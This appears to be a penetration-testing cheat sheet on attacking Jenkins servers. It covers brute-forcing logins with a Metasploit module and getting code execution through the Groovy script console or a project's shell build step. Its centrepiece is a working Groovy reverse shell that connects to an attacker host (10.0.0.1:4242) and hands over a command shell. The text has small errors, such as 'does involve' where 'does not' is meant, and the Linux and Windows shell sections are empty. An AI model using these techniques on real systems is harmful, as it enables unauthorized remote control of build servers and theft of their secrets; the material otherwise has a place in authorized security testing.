Jenkins

Bruteforcing passwords on Jenkins

Metasploit has a specific modules for that, too. This is especially efficient since Jenkins apparently does not possess any bruteforce protection scheme or password policy.

msf> use auxiliary/scanner/http/jenkins_login

Code execution on Jenkins

Use the groovy script engine

The easiest way for a penetration tester, since unlike the second method, it does involve creating or building any new Jenkins project.

The Jenkins groovy script engine can be found in the /script directory of your Jenkins install. It consists of a text box where scripts can be written and executed. Basic commands can be executed :

#For Windows
cmd.exe /c [commmand]
#For Linux
"[command].execute().text

But I know what you're here for : reverse shells !

Universal reverse shell

Thread.start {
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

Linux reverse shell

Windows reverse shell

Create a new Project

This method is not the ideal one since it is clearly isn't the pinnacle of discretion, and requires that our authenticated user has the right to create a new Jenkins project. If that is indeed the case, then ; -Create a new ('freestyle') project -Go the the 'Build section' => 'Execute Shell' and paste your payload (a powershell one is suggested) -Click on 'Build Now'

Metasploit

Metasploit has a code execution module automates the whole process, provided you have valid credentials ;